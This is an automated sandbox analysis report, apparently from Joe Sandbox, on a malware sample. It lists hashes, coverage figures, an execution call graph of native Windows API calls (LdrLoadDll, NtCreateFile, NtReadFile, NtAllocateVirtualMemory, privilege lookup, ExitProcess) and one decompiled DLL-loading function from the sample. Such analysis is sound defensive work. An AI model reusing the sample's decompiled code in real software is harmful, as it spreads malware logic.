                                          • API String ID:
                                          • Opcode ID: 0921494f95062b60686cb2be7fada28e8b1a22b35592e7fdfcfa17de049482f3
                                          • Instruction ID: 4d3e862198f2142adc7aad9e23a38303a8d94092d3b7653dca12b218daf6c16e
                                          • Opcode Fuzzy Hash: 0921494f95062b60686cb2be7fada28e8b1a22b35592e7fdfcfa17de049482f3
                                          • Instruction Fuzzy Hash: DCA17036E00219CFCF05EFA5C9449DEBBF2FF84704B15856AE905BB260EB71A955CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A83AA0 Relevance: .2, Instructions: 224COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b6bd0d2700d9ef5e51377e8d131fc62eb661708b6eb8bc69bdf269db0445e3d7
                                          • Instruction ID: 654759023fb972af4f95aa44fd468e7dbecb71d3d33faaadd9c5363d408a4a23
                                          • Opcode Fuzzy Hash: b6bd0d2700d9ef5e51377e8d131fc62eb661708b6eb8bc69bdf269db0445e3d7
                                          • Instruction Fuzzy Hash: FCC15BB1C817468BD710DF26E8D818E3B71BB45324FD06A09D1632B6D8D7B824EAEF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:3.8%
                                          Dynamic/Decrypted Code Coverage:2.5%
                                          Signature Coverage:4.7%
                                          Total number of Nodes:681
                                          Total number of Limit Nodes:85
                                          execution_graph 33598 4200a3 33601 41e783 33598->33601 33606 41f1b3 33601->33606 33603 41e79f 33610 10e9a00 LdrInitializeThunk 33603->33610 33604 41e7ba 33607 41f1c2 33606->33607 33609 41f238 33606->33609 33607->33609 33611 4195b3 33607->33611 33609->33603 33610->33604 33612 4195cd 33611->33612 33613 4195c1 33611->33613 33612->33609 33613->33612 33616 419a33 LdrLoadDll 33613->33616 33615 41971f 33615->33609 33616->33615 33617 40b4c3 33618 40b4e8 33617->33618 33623 40cf03 33618->33623 33620 40b51b 33622 40b540 33620->33622 33628 40eac3 33620->33628 33625 40cf27 33623->33625 33624 40cf2e 33624->33620 33625->33624 33626 40cf63 LdrLoadDll 33625->33626 33627 40cf7a 33625->33627 33626->33627 33627->33620 33629 40eaef 33628->33629 33639 41e3e3 33629->33639 33632 40eb0f 33632->33622 33634 40eb32 33634->33632 33651 41ea13 LdrLoadDll 33634->33651 33636 40eb4a 33652 41e693 33636->33652 33638 40eb6d 33638->33622 33640 41f1b3 LdrLoadDll 33639->33640 33641 40eb08 33640->33641 33641->33632 33642 41e423 33641->33642 33643 41e43f 33642->33643 33644 41f1b3 LdrLoadDll 33642->33644 33655 10e9710 LdrInitializeThunk 33643->33655 33644->33643 33645 41e45a 33645->33634 33646 41f1b3 LdrLoadDll 33645->33646 33647 41e47f 33646->33647 33656 10e9910 LdrInitializeThunk 33647->33656 33648 41e49e 33648->33634 33651->33636 33653 41e6af NtClose 33652->33653 33654 41f1b3 LdrLoadDll 33652->33654 33653->33638 33654->33653 33655->33645 33656->33648 33657 401664 33658 401691 33657->33658 33662 4233a3 33658->33662 33665 42339f 33658->33665 33659 4017a6 33669 41fbe3 33662->33669 33666 4233a3 33665->33666 33667 41fbe3 22 API calls 33666->33667 33668 4233ae 33667->33668 33668->33659 33670 41fc09 33669->33670 33683 40be93 33670->33683 33672 41fc15 33673 41fc79 33672->33673 33691 410083 33672->33691 33673->33659 33675 41fc34 33676 41fc47 33675->33676 33703 410043 33675->33703 33679 41fc5c 33676->33679 33712 41e8b3 33676->33712 33708 403513 33679->33708 33681 41fc6b 33682 41e8b3 2 API calls 33681->33682 33682->33673 33684 40bea0 33683->33684 33715 40bde3 33683->33715 33686 40bea7 33684->33686 33727 40bd83 33684->33727 33686->33672 33692 4100af 33691->33692 34122 40d3d3 33692->34122 33694 4100c1 34126 40ff53 33694->34126 33697 4100f4 33700 410105 33697->33700 33702 41e693 2 API calls 33697->33702 33698 4100dc 33699 4100e7 33698->33699 33701 41e693 2 API calls 33698->33701 33699->33675 33700->33675 33701->33699 33702->33700 33704 4195b3 LdrLoadDll 33703->33704 33705 410062 33704->33705 33706 410069 33705->33706 33707 41006b GetUserGeoID 33705->33707 33706->33676 33707->33676 33709 403550 33708->33709 33711 403577 33709->33711 34145 40dd63 33709->34145 33711->33681 33713 41f1b3 LdrLoadDll 33712->33713 33714 41e8d2 ExitProcess 33713->33714 33714->33679 33716 40bdf6 33715->33716 33766 41ce53 LdrLoadDll 33715->33766 33746 41cd23 33716->33746 33719 40be09 33719->33684 33720 40bdff 33720->33719 33749 41f533 33720->33749 33722 40be46 33722->33719 33760 40bc23 33722->33760 33724 40be66 33767 40b683 LdrLoadDll 33724->33767 33726 40be78 33726->33684 33728 40bda0 33727->33728 33729 41f823 LdrLoadDll 33727->33729 34103 41f823 33728->34103 33729->33728 33732 41f823 LdrLoadDll 33733 40bdcd 33732->33733 33734 40fe43 33733->33734 33735 40fe5c 33734->33735 34107 40d253 33735->34107 33737 40fe6f 33738 41e3e3 LdrLoadDll 33737->33738 33739 40fe7e 33738->33739 33745 40beb8 33739->33745 34111 41e9d3 33739->34111 33741 40fe95 33744 40fec0 33741->33744 34114 41e463 33741->34114 33742 41e693 2 API calls 33742->33745 33744->33742 33745->33672 33747 41cd38 33746->33747 33768 41e803 LdrLoadDll 33746->33768 33747->33720 33750 41f54c 33749->33750 33769 4191a3 33750->33769 33752 41f564 33753 41f56d 33752->33753 33808 41f373 33752->33808 33753->33722 33755 41f581 33755->33753 33825 41e103 33755->33825 33757 41f5b5 33830 4200e3 33757->33830 34081 409423 33760->34081 33762 40bc44 33762->33724 33763 40bc3d 33763->33762 34094 4096e3 33763->34094 33766->33716 33767->33726 33768->33747 33770 4194e6 33769->33770 33772 4191b7 33769->33772 33770->33752 33772->33770 33833 41de53 33772->33833 33774 4192e8 33836 41e563 33774->33836 33775 4192cb 33893 41e663 LdrLoadDll 33775->33893 33778 4192d5 33778->33752 33779 41930f 33780 4200e3 2 API calls 33779->33780 33783 41931b 33780->33783 33781 4194aa 33784 41e693 2 API calls 33781->33784 33782 4194c0 33899 418ec3 LdrLoadDll NtReadFile NtClose 33782->33899 33783->33778 33783->33781 33783->33782 33788 4193b3 33783->33788 33785 4194b1 33784->33785 33785->33752 33787 4194d3 33787->33752 33789 41941a 33788->33789 33791 4193c2 33788->33791 33789->33781 33790 41942d 33789->33790 33895 41e4e3 33790->33895 33793 4193c7 33791->33793 33794 4193db 33791->33794 33894 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33793->33894 33797 4193e0 33794->33797 33798 4193f8 33794->33798 33839 418e23 33797->33839 33798->33785 33851 418b43 33798->33851 33800 4193d1 33800->33752 33802 41948d 33806 41e693 2 API calls 33802->33806 33803 4193ee 33803->33752 33805 419410 33805->33752 33807 419499 33806->33807 33807->33752 33810 41f38e 33808->33810 33809 41f3a0 33809->33755 33810->33809 33917 420063 33810->33917 33812 41f3c0 33920 4187a3 33812->33920 33814 41f3e3 33814->33809 33815 4187a3 3 API calls 33814->33815 33816 41f405 33815->33816 33816->33809 33952 419b03 33816->33952 33818 41f48d 33819 41f49d 33818->33819 34047 41f133 LdrLoadDll 33818->34047 33963 41efa3 33819->33963 33822 41f4cb 34042 41e0c3 33822->34042 33824 41f4f5 33824->33755 33826 41f1b3 LdrLoadDll 33825->33826 33827 41e11f 33826->33827 34075 10e967a 33827->34075 33828 41e13a 33828->33757 33831 41f5df 33830->33831 34078 41e873 33830->34078 33831->33722 33834 41f1b3 LdrLoadDll 33833->33834 33835 41929c 33834->33835 33835->33774 33835->33775 33835->33778 33837 41f1b3 LdrLoadDll 33836->33837 33838 41e57f NtCreateFile 33837->33838 33838->33779 33840 418e3f 33839->33840 33841 41e4e3 LdrLoadDll 33840->33841 33842 418e60 33841->33842 33843 418e67 33842->33843 33844 418e7b 33842->33844 33845 41e693 2 API calls 33843->33845 33846 41e693 2 API calls 33844->33846 33847 418e70 33845->33847 33848 418e84 33846->33848 33847->33803 33900 420203 LdrLoadDll RtlAllocateHeap 33848->33900 33850 418e8f 33850->33803 33852 418bc1 33851->33852 33853 418b8e 33851->33853 33855 418d0c 33852->33855 33858 418bdd 33852->33858 33854 41e4e3 LdrLoadDll 33853->33854 33856 418ba9 33854->33856 33857 41e4e3 LdrLoadDll 33855->33857 33859 41e693 2 API calls 33856->33859 33863 418d27 33857->33863 33860 41e4e3 LdrLoadDll 33858->33860 33861 418bb2 33859->33861 33862 418bf8 33860->33862 33861->33805 33865 418c14 33862->33865 33866 418bff 33862->33866 33913 41e523 LdrLoadDll 33863->33913 33869 418c19 33865->33869 33870 418c2f 33865->33870 33868 41e693 2 API calls 33866->33868 33867 418d61 33871 41e693 2 API calls 33867->33871 33872 418c08 33868->33872 33873 41e693 2 API calls 33869->33873 33878 418c34 33870->33878 33901 4201c3 33870->33901 33874 418d6c 33871->33874 33872->33805 33875 418c22 33873->33875 33874->33805 33875->33805 33887 418c46 33878->33887 33904 41e613 33878->33904 33879 418c9a 33880 418cb1 33879->33880 33912 41e4a3 LdrLoadDll 33879->33912 33882 418cb8 33880->33882 33883 418ccd 33880->33883 33885 41e693 2 API calls 33882->33885 33884 41e693 2 API calls 33883->33884 33886 418cd6 33884->33886 33885->33887 33888 418d02 33886->33888 33907 41fee3 33886->33907 33887->33805 33888->33805 33890 418ced 33891 4200e3 2 API calls 33890->33891 33892 418cf6 33891->33892 33892->33805 33893->33778 33894->33800 33896 41f1b3 LdrLoadDll 33895->33896 33897 419475 33895->33897 33896->33897 33898 41e523 LdrLoadDll 33897->33898 33898->33802 33899->33787 33900->33850 33914 41e833 33901->33914 33903 4201db 33903->33878 33905 41f1b3 LdrLoadDll 33904->33905 33906 41e62f NtReadFile 33905->33906 33906->33879 33908 41fef0 33907->33908 33909 41ff07 33907->33909 33908->33909 33910 4201c3 2 API calls 33908->33910 33909->33890 33911 41ff1e 33910->33911 33911->33890 33912->33880 33913->33867 33915 41f1b3 LdrLoadDll 33914->33915 33916 41e84f RtlAllocateHeap 33915->33916 33916->33903 33918 420090 33917->33918 34048 41e743 33917->34048 33918->33812 33921 4187b4 33920->33921 33923 4187bc 33920->33923 33921->33814 33922 418a8f 33922->33814 33923->33922 34051 421263 33923->34051 33925 418810 33926 421263 2 API calls 33925->33926 33929 41881b 33926->33929 33927 418869 33930 421263 2 API calls 33927->33930 33929->33927 33931 421393 3 API calls 33929->33931 34062 421303 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33929->34062 33933 41887d 33930->33933 33931->33929 33932 4188da 33934 421263 2 API calls 33932->33934 33933->33932 34056 421393 33933->34056 33936 4188f0 33934->33936 33937 41892d 33936->33937 33940 421393 3 API calls 33936->33940 33938 421263 2 API calls 33937->33938 33939 418938 33938->33939 33941 421393 3 API calls 33939->33941 33948 418972 33939->33948 33940->33936 33941->33939 33943 418a67 34064 4212c3 LdrLoadDll RtlFreeHeap 33943->34064 33945 418a71 34065 4212c3 LdrLoadDll RtlFreeHeap 33945->34065 33947 418a7b 34066 4212c3 LdrLoadDll RtlFreeHeap 33947->34066 34063 4212c3 LdrLoadDll RtlFreeHeap 33948->34063 33950 418a85 34067 4212c3 LdrLoadDll RtlFreeHeap 33950->34067 33953 419b14 33952->33953 33954 4191a3 8 API calls 33953->33954 33956 419b2a 33954->33956 33955 419b33 33955->33818 33956->33955 33957 419b67 33956->33957 33960 419bb3 33956->33960 33958 4200e3 2 API calls 33957->33958 33959 419b78 33958->33959 33959->33818 33961 4200e3 2 API calls 33960->33961 33962 419bb8 33961->33962 33962->33818 33964 41efb7 33963->33964 33965 41ee33 LdrLoadDll 33963->33965 34068 41ee33 33964->34068 33965->33964 33967 41efc0 33968 41ee33 LdrLoadDll 33967->33968 33969 41efc9 33968->33969 33970 41ee33 LdrLoadDll 33969->33970 33971 41efd2 33970->33971 33972 41ee33 LdrLoadDll 33971->33972 33973 41efdb 33972->33973 33974 41ee33 LdrLoadDll 33973->33974 33975 41efe4 33974->33975 33976 41ee33 LdrLoadDll 33975->33976 33977 41eff0 33976->33977 33978 41ee33 LdrLoadDll 33977->33978 33979 41eff9 33978->33979 33980 41ee33 LdrLoadDll 33979->33980 33981 41f002 33980->33981 33982 41ee33 LdrLoadDll 33981->33982 33983 41f00b 33982->33983 33984 41ee33 LdrLoadDll 33983->33984 33985 41f014 33984->33985 33986 41ee33 LdrLoadDll 33985->33986 33987 41f01d 33986->33987 33988 41ee33 LdrLoadDll 33987->33988 33989 41f029 33988->33989 33990 41ee33 LdrLoadDll 33989->33990 33991 41f032 33990->33991 33992 41ee33 LdrLoadDll 33991->33992 33993 41f03b 33992->33993 33994 41ee33 LdrLoadDll 33993->33994 33995 41f044 33994->33995 33996 41ee33 LdrLoadDll 33995->33996 33997 41f04d 33996->33997 33998 41ee33 LdrLoadDll 33997->33998 33999 41f056 33998->33999 34000 41ee33 LdrLoadDll 33999->34000 34001 41f062 34000->34001 34002 41ee33 LdrLoadDll 34001->34002 34003 41f06b 34002->34003 34004 41ee33 LdrLoadDll 34003->34004 34005 41f074 34004->34005 34006 41ee33 LdrLoadDll 34005->34006 34007 41f07d 34006->34007 34008 41ee33 LdrLoadDll 34007->34008 34009 41f086 34008->34009 34010 41ee33 LdrLoadDll 34009->34010 34011 41f08f 34010->34011 34012 41ee33 LdrLoadDll 34011->34012 34013 41f09b 34012->34013 34014 41ee33 LdrLoadDll 34013->34014 34015 41f0a4 34014->34015 34016 41ee33 LdrLoadDll 34015->34016 34017 41f0ad 34016->34017 34018 41ee33 LdrLoadDll 34017->34018 34019 41f0b6 34018->34019 34020 41ee33 LdrLoadDll 34019->34020 34021 41f0bf 34020->34021 34022 41ee33 LdrLoadDll 34021->34022 34023 41f0c8 34022->34023 34024 41ee33 LdrLoadDll 34023->34024 34025 41f0d4 34024->34025 34026 41ee33 LdrLoadDll 34025->34026 34027 41f0dd 34026->34027 34028 41ee33 LdrLoadDll 34027->34028 34029 41f0e6 34028->34029 34030 41ee33 LdrLoadDll 34029->34030 34031 41f0ef 34030->34031 34032 41ee33 LdrLoadDll 34031->34032 34033 41f0f8 34032->34033 34034 41ee33 LdrLoadDll 34033->34034 34035 41f101 34034->34035 34036 41ee33 LdrLoadDll 34035->34036 34037 41f10d 34036->34037 34038 41ee33 LdrLoadDll 34037->34038 34039 41f116 34038->34039 34040 41ee33 LdrLoadDll 34039->34040 34041 41f11f 34040->34041 34041->33822 34043 41f1b3 LdrLoadDll 34042->34043 34044 41e0df 34043->34044 34074 10e9860 LdrInitializeThunk 34044->34074 34045 41e0f6 34045->33824 34047->33819 34049 41f1b3 LdrLoadDll 34048->34049 34050 41e75f NtAllocateVirtualMemory 34049->34050 34050->33918 34052 421273 34051->34052 34053 421279 34051->34053 34052->33925 34054 4201c3 2 API calls 34053->34054 34055 42129f 34054->34055 34055->33925 34057 421303 34056->34057 34058 421360 34057->34058 34059 4201c3 2 API calls 34057->34059 34058->33933 34060 42133d 34059->34060 34061 4200e3 2 API calls 34060->34061 34061->34058 34062->33929 34063->33943 34064->33945 34065->33947 34066->33950 34067->33922 34069 41ee4e 34068->34069 34070 4195b3 LdrLoadDll 34069->34070 34071 41ee6e 34070->34071 34072 4195b3 LdrLoadDll 34071->34072 34073 41ef22 34071->34073 34072->34073 34073->33967 34073->34073 34074->34045 34076 10e968f LdrInitializeThunk 34075->34076 34077 10e9681 34075->34077 34076->33828 34077->33828 34079 41e88f RtlFreeHeap 34078->34079 34080 41f1b3 LdrLoadDll 34078->34080 34079->33831 34080->34079 34082 409433 34081->34082 34083 40942e 34081->34083 34084 420063 2 API calls 34082->34084 34083->33763 34091 409458 34084->34091 34085 4094bb 34085->33763 34086 41e0c3 2 API calls 34086->34091 34087 4094c1 34088 4094e7 34087->34088 34090 41e7c3 2 API calls 34087->34090 34088->33763 34093 4094d8 34090->34093 34091->34085 34091->34086 34091->34087 34092 420063 2 API calls 34091->34092 34097 41e7c3 34091->34097 34092->34091 34093->33763 34095 409701 34094->34095 34096 41e7c3 2 API calls 34094->34096 34095->33724 34096->34095 34098 41f1b3 LdrLoadDll 34097->34098 34099 41e7df 34098->34099 34102 10e96e0 LdrInitializeThunk 34099->34102 34100 41e7f6 34100->34091 34102->34100 34104 41f846 34103->34104 34105 40cf03 LdrLoadDll 34104->34105 34106 40bdb4 34105->34106 34106->33732 34108 40d276 34107->34108 34110 40d2f0 34108->34110 34120 41de93 LdrLoadDll 34108->34120 34110->33737 34112 41e9f2 LookupPrivilegeValueW 34111->34112 34113 41f1b3 LdrLoadDll 34111->34113 34112->33741 34113->34112 34115 41e471 34114->34115 34116 41f1b3 LdrLoadDll 34115->34116 34117 41e47f 34116->34117 34121 10e9910 LdrInitializeThunk 34117->34121 34118 41e49e 34118->33744 34120->34110 34121->34118 34123 40d3fa 34122->34123 34124 40d253 LdrLoadDll 34123->34124 34125 40d45d 34124->34125 34125->33694 34127 40ff6d 34126->34127 34135 410023 34126->34135 34128 40d253 LdrLoadDll 34127->34128 34129 40ff8f 34128->34129 34136 41e143 34129->34136 34131 40ffd1 34139 41e183 34131->34139 34134 41e693 2 API calls 34134->34135 34135->33697 34135->33698 34137 41e15f 34136->34137 34138 41f1b3 LdrLoadDll 34136->34138 34137->34131 34138->34137 34140 41f1b3 LdrLoadDll 34139->34140 34141 41e19f 34140->34141 34144 10e9fe0 LdrInitializeThunk 34141->34144 34142 410017 34142->34134 34144->34142 34146 40dd8e 34145->34146 34147 40d3d3 LdrLoadDll 34146->34147 34148 40dde5 34147->34148 34181 40d053 34148->34181 34150 40de0b 34180 40e05c 34150->34180 34190 418ad3 34150->34190 34152 40de50 34152->34180 34193 40a053 34152->34193 34154 40de94 34154->34180 34215 41e703 34154->34215 34158 40deea 34159 40def1 34158->34159 34228 41e213 34158->34228 34160 4200e3 2 API calls 34159->34160 34162 40defe 34160->34162 34162->33711 34164 40df3b 34165 4200e3 2 API calls 34164->34165 34166 40df42 34165->34166 34166->33711 34167 40df4b 34168 410113 3 API calls 34167->34168 34169 40dfbf 34168->34169 34169->34159 34170 40dfca 34169->34170 34171 4200e3 2 API calls 34170->34171 34172 40dfee 34171->34172 34233 41e263 34172->34233 34175 41e213 2 API calls 34176 40e029 34175->34176 34176->34180 34238 41e023 34176->34238 34179 41e8b3 2 API calls 34179->34180 34180->33711 34182 40d060 34181->34182 34183 40d064 34181->34183 34182->34150 34184 40d0af 34183->34184 34185 40d07d 34183->34185 34244 41ded3 LdrLoadDll 34184->34244 34243 41ded3 LdrLoadDll 34185->34243 34187 40d0c0 34187->34150 34189 40d09f 34189->34150 34191 410113 3 API calls 34190->34191 34192 418af9 34190->34192 34191->34192 34192->34152 34245 40a283 34193->34245 34195 40a279 34195->34154 34196 40a071 34196->34195 34197 409423 4 API calls 34196->34197 34198 40a14f 34196->34198 34208 40a0af 34197->34208 34198->34195 34199 40a22f 34198->34199 34200 409423 4 API calls 34198->34200 34199->34195 34294 410383 10 API calls 34199->34294 34212 40a18c 34200->34212 34202 40a243 34202->34195 34295 410383 10 API calls 34202->34295 34204 40a259 34204->34195 34296 410383 10 API calls 34204->34296 34206 40a26f 34206->34154 34208->34198 34209 40a145 34208->34209 34259 409d33 34208->34259 34210 4096e3 2 API calls 34209->34210 34210->34198 34211 409d33 14 API calls 34211->34212 34212->34199 34212->34211 34213 40a225 34212->34213 34214 4096e3 2 API calls 34213->34214 34214->34199 34216 41e719 34215->34216 34217 41f1b3 LdrLoadDll 34216->34217 34218 41e71f 34217->34218 34413 10e98f0 LdrInitializeThunk 34218->34413 34219 40decb 34221 410113 34219->34221 34222 410130 34221->34222 34414 41e1c3 34222->34414 34225 410178 34225->34158 34226 41e213 2 API calls 34227 4101a1 34226->34227 34227->34158 34229 41f1b3 LdrLoadDll 34228->34229 34230 41e22f 34229->34230 34420 10e9780 LdrInitializeThunk 34230->34420 34231 40df2e 34231->34164 34231->34167 34234 41f1b3 LdrLoadDll 34233->34234 34235 41e27f 34234->34235 34421 10e97a0 LdrInitializeThunk 34235->34421 34236 40e002 34236->34175 34239 41f1b3 LdrLoadDll 34238->34239 34240 41e03f 34239->34240 34422 10e9a20 LdrInitializeThunk 34240->34422 34241 40e055 34241->34179 34243->34189 34244->34187 34246 40a2aa 34245->34246 34247 409423 4 API calls 34246->34247 34254 40a50f 34246->34254 34248 40a2fd 34247->34248 34249 4096e3 2 API calls 34248->34249 34248->34254 34250 40a38c 34249->34250 34251 409423 4 API calls 34250->34251 34250->34254 34252 40a3a1 34251->34252 34253 4096e3 2 API calls 34252->34253 34252->34254 34257 40a401 34253->34257 34254->34196 34255 409423 4 API calls 34255->34257 34256 409d33 14 API calls 34256->34257 34257->34254 34257->34255 34257->34256 34258 4096e3 2 API calls 34257->34258 34258->34257 34260 409d3e 34259->34260 34297 409d9f 34260->34297 34262 409d87 34328 41df13 34262->34328 34265 409dac 34265->34208 34266 409e2d 34361 410263 LdrLoadDll NtClose 34266->34361 34267 41e103 2 API calls 34268 409dd0 34267->34268 34268->34266 34269 409ddb 34268->34269 34271 409e59 34269->34271 34331 40e073 34269->34331 34271->34208 34272 409e48 34274 409e65 34272->34274 34275 409e4f 34272->34275 34362 41df93 LdrLoadDll 34274->34362 34277 41e693 2 API calls 34275->34277 34276 409df5 34276->34271 34351 409b63 34276->34351 34277->34271 34279 409e90 34281 40e073 5 API calls 34279->34281 34283 409eb0 34281->34283 34283->34271 34363 41dfc3 LdrLoadDll 34283->34363 34285 409ed5 34364 41e053 LdrLoadDll 34285->34364 34287 409eef 34288 41e023 2 API calls 34287->34288 34289 409efe 34288->34289 34290 41e693 2 API calls 34289->34290 34291 409f08 34290->34291 34365 409933 34291->34365 34293 409f1c 34293->34208 34294->34202 34295->34204 34296->34206 34298 409db4 34297->34298 34299 409dac 34297->34299 34300 409e2d 34298->34300 34301 41e103 2 API calls 34298->34301 34299->34262 34381 410263 LdrLoadDll NtClose 34300->34381 34302 409dd0 34301->34302 34302->34300 34303 409ddb 34302->34303 34305 409e59 34303->34305 34307 40e073 5 API calls 34303->34307 34305->34262 34306 409e48 34308 409e65 34306->34308 34309 409e4f 34306->34309 34310 409df5 34307->34310 34382 41df93 LdrLoadDll 34308->34382 34311 41e693 2 API calls 34309->34311 34310->34305 34314 409b63 12 API calls 34310->34314 34311->34305 34313 409e90 34315 40e073 5 API calls 34313->34315 34316 409e23 34314->34316 34317 409eb0 34315->34317 34316->34262 34317->34305 34383 41dfc3 LdrLoadDll 34317->34383 34319 409ed5 34384 41e053 LdrLoadDll 34319->34384 34321 409eef 34322 41e023 2 API calls 34321->34322 34323 409efe 34322->34323 34324 41e693 2 API calls 34323->34324 34325 409f08 34324->34325 34326 409933 11 API calls 34325->34326 34327 409f1c 34326->34327 34327->34262 34329 409da2 34328->34329 34330 41f1b3 LdrLoadDll 34328->34330 34329->34265 34329->34266 34329->34267 34330->34329 34332 40e0a1 34331->34332 34333 410113 3 API calls 34332->34333 34334 40e103 34333->34334 34335 40e14c 34334->34335 34336 41e213 2 API calls 34334->34336 34335->34276 34337 40e12e 34336->34337 34338 40e138 34337->34338 34341 40e158 34337->34341 34339 41e263 2 API calls 34338->34339 34340 40e142 34339->34340 34342 41e693 2 API calls 34340->34342 34343 40e1e2 34341->34343 34344 40e1c5 34341->34344 34342->34335 34345 41e263 2 API calls 34343->34345 34346 41e693 2 API calls 34344->34346 34347 40e1f1 34345->34347 34348 40e1cf 34346->34348 34349 41e693 2 API calls 34347->34349 34348->34276 34350 40e1fb 34349->34350 34350->34276 34352 409b79 34351->34352 34357 409d04 34352->34357 34385 409723 34352->34385 34354 409c78 34355 409933 11 API calls 34354->34355 34354->34357 34356 409ca6 34355->34356 34356->34357 34358 41e103 2 API calls 34356->34358 34357->34208 34359 409cdb 34358->34359 34359->34357 34360 41e703 2 API calls 34359->34360 34360->34357 34361->34272 34362->34279 34363->34285 34364->34287 34366 40995c 34365->34366 34392 409893 34366->34392 34369 41e703 2 API calls 34370 40996f 34369->34370 34370->34369 34371 4099fa 34370->34371 34373 4099f5 34370->34373 34400 4102e3 34370->34400 34371->34293 34372 41e693 2 API calls 34374 409a2d 34372->34374 34373->34372 34374->34371 34375 41df13 LdrLoadDll 34374->34375 34376 409a92 34375->34376 34376->34371 34404 41df53 34376->34404 34378 409af6 34378->34371 34379 4191a3 8 API calls 34378->34379 34380 409b4b 34379->34380 34380->34293 34381->34306 34382->34313 34383->34319 34384->34321 34386 409822 34385->34386 34387 409738 34385->34387 34386->34354 34387->34386 34388 4191a3 8 API calls 34387->34388 34389 4097a5 34388->34389 34390 4200e3 2 API calls 34389->34390 34391 4097cc 34389->34391 34390->34391 34391->34354 34393 4098ad 34392->34393 34394 40cf03 LdrLoadDll 34393->34394 34395 4098c8 34394->34395 34396 4195b3 LdrLoadDll 34395->34396 34397 4098e0 34396->34397 34398 4098fc 34397->34398 34399 4098e9 PostThreadMessageW 34397->34399 34398->34370 34399->34398 34401 4102f6 34400->34401 34407 41e093 34401->34407 34405 41f1b3 LdrLoadDll 34404->34405 34406 41df6f 34405->34406 34406->34378 34408 41e0af 34407->34408 34409 41f1b3 LdrLoadDll 34407->34409 34412 10e9840 LdrInitializeThunk 34408->34412 34409->34408 34410 410321 34410->34370 34412->34410 34413->34219 34415 41f1b3 LdrLoadDll 34414->34415 34416 41e1df 34415->34416 34419 10e99a0 LdrInitializeThunk 34416->34419 34417 410171 34417->34225 34417->34226 34419->34417 34420->34231 34421->34236 34422->34241 34423 10e9540 LdrInitializeThunk

                                          Executed Functions

                                          Function 0040CF03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 407 40cf03-40cf1f 408 40cf27-40cf2c 407->408 409 40cf22 call 420e83 407->409 410 40cf32-40cf40 call 4213a3 408->410 411 40cf2e-40cf31 408->411 409->408 414 40cf50-40cf61 call 41f723 410->414 415 40cf42-40cf4d call 421623 410->415 420 40cf63-40cf77 LdrLoadDll 414->420 421 40cf7a-40cf7d 414->421 415->414 420->421
                                          C-Code - Quality: 100%
                                          			E0040CF03(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420E83( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E004213A3(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421623( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F723(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                          0x0040cf1f
                                          0x0040cf22
                                          0x0040cf27
                                          0x0040cf2c
                                          0x0040cf36
                                          0x0040cf3b
                                          0x0040cf3e
                                          0x0040cf40
                                          0x0040cf48
                                          0x0040cf4d
                                          0x0040cf4d
                                          0x0040cf54
                                          0x0040cf5c
                                          0x0040cf5f
                                          0x0040cf61
                                          0x0040cf75
                                          0x00000000
                                          0x0040cf77
                                          0x0040cf7d
                                          0x0040cf31
                                          0x0040cf31
                                          0x0040cf31

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF75
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 1f79ec65728361f6aacc61d0b8ee144499b1802415a85c76e63a64ecc08ce9c1
                                          • Instruction ID: 50010c7138d93e6f9ea6e265deb9c9d9996512de15ce5229bf2c89d0c65d76ae
                                          • Opcode Fuzzy Hash: 1f79ec65728361f6aacc61d0b8ee144499b1802415a85c76e63a64ecc08ce9c1
                                          • Instruction Fuzzy Hash: D20152B1E4010EB7DB10DBE1DC82FDEB3789B14308F0042A6F908A7281F634EB448B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E65D Relevance: 1.5, APIs: 1, Instructions: 46filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 422 41e65d-41e661 423 41e663-41e68c call 41f1b3 422->423 424 41e62c-41e65c NtReadFile 422->424
                                          APIs
                                          • NtReadFile.NTDLL(004194D3,004149A1,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A1,004194D3,00000002,00000000), ref: 0041E658
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_535276_86376.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
